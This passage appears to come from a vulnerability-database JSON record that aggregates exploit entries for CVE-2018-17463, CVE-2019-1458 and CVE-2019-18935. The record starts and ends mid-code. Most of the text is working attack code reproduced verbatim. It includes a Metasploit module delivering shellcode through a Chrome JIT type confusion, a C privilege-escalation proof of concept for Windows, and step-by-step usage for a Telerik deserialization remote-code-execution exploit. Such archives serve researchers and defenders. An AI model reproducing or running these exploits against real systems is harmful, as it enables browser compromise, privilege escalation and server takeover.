= memory.addrof(wasm_instance);\r\n print(\"wasm_addr @ \" + hex(wasm_addr));\r\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\r\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\r\n\r\n memory.write(wasm_rwx_addr, shellcode);\r\n\r\n let fake_vtab = new ArrayBuffer(0x80);\r\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\r\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\r\n\r\n let div = document.createElement('div');\r\n let div_addr = memory.addrof(div);\r\n print('div_addr @ ' + hex(div_addr));\r\n let el_addr = memory.readPtr(div_addr + 0x20n);\r\n print('el_addr @ ' + hex(div_addr));\r\n\r\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\r\n memory.writePtr(el_addr, fake_vtab_addr);\r\n\r\n print('Triggering...');\r\n\r\n // Trigger virtual call\r\n div.dispatchEvent(new Event('click'));\r\n\r\n // We are done here, repair the corrupted array buffers\r\n let addr = memory.addrof(driver_buf);\r\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\r\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\r\n}\r\n\r\npwn();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n^\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend\n\n# 0day.today [2020-03-06] #", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/34054"}, {"lastseen": "2020-03-09T21:06:08", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2020-03-09T00:00:00", "title": "Microsoft Windows - (WizardOpium) Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-09T00:00:00", "id": "1337DAY-ID-34066", "href": "https://0day.today/exploit/description/34066", "sourceData": "#include <cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = (PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}\n\n# 0day.today [2020-03-09] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34066"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:44", "description": "\nTelerik UI - Remote Code Execution via Insecure Deserialization", "edition": 1, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "href": "", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\n\nInstall\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\npython3 -m venv env\nsource env/bin/activate\npip3 install -r requirements.txt\n\nRequirements\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\n\nUsage\nCompile mixed mode assembly DLL payload\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\n\nbuild_dll.bat sleep.c\nUpload and load payload into application via insecure deserialization\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\n\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\n[*] Local payload name: sleep_2019121205271355_x86.dll\n[*] Destination folder: C:\\Windows\\Temp\n[*] Remote payload name: 1576142987.918625.dll\n\n{'fileInfo': {'ContentLength': 75264,\n 'ContentType': 'application/octet-stream',\n 'DateJson': '1970-01-01T00:00:00.000Z',\n 'FileName': '1576142987.918625.dll',\n 'Index': 0},\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\n 'Telerik.Web.UI, Version=<VERSION>, '\n 'Culture=neutral, '\n 'PublicKeyToken=<TOKEN>',\n 'TempFileName': '1576142987.918625.dll'}}\n\n[*] Triggering deserialization...\n\n<title>Runtime Error</title>\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\n<h2> <i>Runtime Error</i> </h2></span>\n...omitted for brevity...\n\n[*] Response time: 13.01 seconds\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\n\nThanks\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-12-18T13:23:58", "description": "", "published": "2019-12-18T00:00:00", "type": "exploitdb", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EDB-ID:47793", "href": "https://www.exploit-db.com/exploits/47793", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47793"}, {"lastseen": "2020-03-09T21:37:40", "description": "", "published": "2020-03-09T00:00:00", "type": "exploitdb", "title": "Google Chrome 67, 68 and 69 - Object.create Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-03-09T00:00:00", "id": "EDB-ID:48184", "href": "https://www.exploit-db.com/exploits/48184", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\r\n 'Description' => %q{\r\n This modules exploits a type confusion in Google Chromes JIT compiler.\r\n The Object.create operation can be used to cause a type confusion between a\r\n PropertyArray and a NameDictionary.\r\n The payload is executed within the rwx region of the sandboxed renderer\r\n process, so the browser must be run with the --no-sandbox option for the\r\n payload to work.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'saelo', # discovery and exploit\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-17463'],\r\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\r\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'Platform' => ['windows', 'osx'],\r\n 'DefaultTarget' => 0,\r\n 'Targets' => [ [ 'Automatic', { } ] ],\r\n 'DisclosureDate' => 'Sep 25 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] \" + request.body)\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n\r\n jscript = %Q^\r\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\r\n\r\nlet ab = new ArrayBuffer(8);\r\nlet floatView = new Float64Array(ab);\r\nlet uint64View = new BigUint64Array(ab);\r\nlet uint8View = new Uint8Array(ab);\r\n\r\nNumber.prototype.toBigInt = function toBigInt() {\r\n floatView[0] = this;\r\n return uint64View[0];\r\n};\r\n\r\nBigInt.prototype.toNumber = function toNumber() {\r\n uint64View[0] = this;\r\n return floatView[0];\r\n};\r\n\r\nfunction hex(n) {\r\n return '0x' + n.toString(16);\r\n};\r\n\r\nfunction fail(s) {\r\n print('FAIL ' + s);\r\n throw null;\r\n}\r\n\r\nconst NUM_PROPERTIES = 32;\r\nconst MAX_ITERATIONS = 100000;\r\n\r\nfunction gc() {\r\n for (let i = 0; i < 200; i++) {\r\n new ArrayBuffer(0x100000);\r\n }\r\n}\r\n\r\nfunction make(properties) {\r\n let o = {inline: 42} // TODO\r\n for (let i = 0; i < NUM_PROPERTIES; i++) {\r\n eval(`o.p${i} = properties[${i}];`);\r\n }\r\n return o;\r\n}\r\n\r\nfunction pwn() {\r\n function find_overlapping_properties() {\r\n let propertyNames = [];\r\n for (let i = 0; i < NUM_PROPERTIES; i++) {\r\n propertyNames[i] = `p${i}`;\r\n }\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\r\n return [${propertyNames.join(', ')}];\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n for (let i = 1; i < NUM_PROPERTIES; i++) {\r\n propertyValues[i] = -i;\r\n }\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n let r = vuln(make(propertyValues));\r\n if (r[1] !== -1) {\r\n for (let i = 1; i < r.length; i++) {\r\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\r\n return [i, -r[i]];\r\n }\r\n }\r\n }\r\n }\r\n\r\n fail(\"Failed to find overlapping properties\");\r\n }\r\n\r\n function addrof(obj) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n return o.p${p1}.x1;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\r\n propertyValues[p2] = {y1: obj};\r\n\r\n let i = 0;\r\n for (; i < MAX_ITERATIONS; i++) {\r\n let res = vuln(make(propertyValues));\r\n if (res !== 13.37)\r\n return res.toBigInt()\r\n }\r\n\r\n fail(\"Addrof failed\");\r\n }\r\n\r\n function corrupt_arraybuffer(victim, newValue) {\r\n eval(`\r\n function vuln(o) {\r\n let a = o.inline;\r\n this.Object.create(o);\r\n let orig = o.p${p1}.x2;\r\n o.p${p1}.x2 = ${newValue.toNumber()};\r\n return orig;\r\n }\r\n `);\r\n\r\n let propertyValues = [];\r\n let o = {x1: 13.37, x2: 13.38};\r\n propertyValues[p1] = o;\r\n propertyValues[p2] = victim;\r\n\r\n for (let i = 0; i < MAX_ITERATIONS; i++) {\r\n o.x2 = 13.38;\r\n let r = vuln(make(propertyValues));\r\n if (r !== 13.38)\r\n return r.toBigInt();\r\n }\r\n\r\n fail(\"Corrupt ArrayBuffer failed\");\r\n }\r\n\r\n let [p1, p2] = find_overlapping_properties();\r\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\r\n\r\n let memview_buf = new ArrayBuffer(1024);\r\n let driver_buf = new ArrayBuffer(1024);\r\n\r\n gc();\r\n\r\n let memview_buf_addr = addrof(memview_buf);\r\n memview_buf_addr--;\r\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\r\n\r\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\r\n\r\n let driver = new BigUint64Array(driver_buf);\r\n let original_memview_buf_ptr = driver[4];\r\n\r\n let memory = {\r\n write(addr, bytes) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n memview.set(bytes);\r\n },\r\n read(addr, len) {\r\n driver[4] = addr;\r\n let memview = new Uint8Array(memview_buf);\r\n return memview.subarray(0, len);\r\n },\r\n readPtr(addr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n return memview[0];\r\n },\r\n writePtr(addr, ptr) {\r\n driver[4] = addr;\r\n let memview = new BigUint64Array(memview_buf);\r\n memview[0] = ptr;\r\n },\r\n addrof(obj) {\r\n memview_buf.leakMe = obj;\r\n let props = this.readPtr(memview_buf_addr + 8n);\r\n return this.readPtr(props + 15n) - 1n;\r\n },\r\n };\r\n\r\n // Generate a RWX region for the payload\r\n function get_wasm_instance() {\r\n var buffer = new Uint8Array([\r\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\r\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\r\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\r\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\r\n ]);\r\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\r\n }\r\n\r\n let wasm_instance = get_wasm_instance();\r\n let wasm_addr = memory.addrof(wasm_instance);\r\n print(\"wasm_addr @ \" + hex(wasm_addr));\r\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\r\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\r\n\r\n memory.write(wasm_rwx_addr, shellcode);\r\n\r\n let fake_vtab = new ArrayBuffer(0x80);\r\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\r\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\r\n\r\n let div = document.createElement('div');\r\n let div_addr = memory.addrof(div);\r\n print('div_addr @ ' + hex(div_addr));\r\n let el_addr = memory.readPtr(div_addr + 0x20n);\r\n print('el_addr @ ' + hex(div_addr));\r\n\r\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\r\n memory.writePtr(el_addr, fake_vtab_addr);\r\n\r\n print('Triggering...');\r\n\r\n // Trigger virtual call\r\n div.dispatchEvent(new Event('click'));\r\n\r\n // We are done here, repair the corrupted array buffers\r\n let addr = memory.addrof(driver_buf);\r\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\r\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\r\n}\r\n\r\npwn();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n^\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48184"}, {"lastseen": "2020-03-09T21:37:40", "description": "", "published": "2020-03-03T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - &#039;WizardOpium&#039; Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-03T00:00:00", "id": "EDB-ID:48180", "href": "https://www.exploit-db.com/exploits/48180", "sourceData": "#include <cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = (PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48180"}], "metasploit": [{"lastseen": "2020-10-13T17:44:26", "description": "This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work.\n", "published": "2020-02-14T22:10:52", "type": "metasploit", "title": "Google Chrome 67, 68 and 69 Object.create exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17463"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process, so the browser must be run with the --no-sandbox option for the\n payload to work.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx'],\n 'DefaultTarget' => 0,\n 'Targets' => [ [ 'Automatic', { } ] ],\n 'DisclosureDate' => '2018-09-25'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] \" + request.body)\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n\n jscript = %Q^\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\n\nlet ab = new ArrayBuffer(8);\nlet floatView = new Float64Array(ab);\nlet uint64View = new BigUint64Array(ab);\nlet uint8View = new Uint8Array(ab);\n\nNumber.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n};\n\nBigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n};\n\nfunction hex(n) {\n return '0x' + n.toString(16);\n};\n\nfunction fail(s) {\n print('FAIL ' + s);\n throw null;\n}\n\nconst NUM_PROPERTIES = 32;\nconst MAX_ITERATIONS = 100000;\n\nfunction gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n}\n\nfunction make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n}\n\nfunction pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = 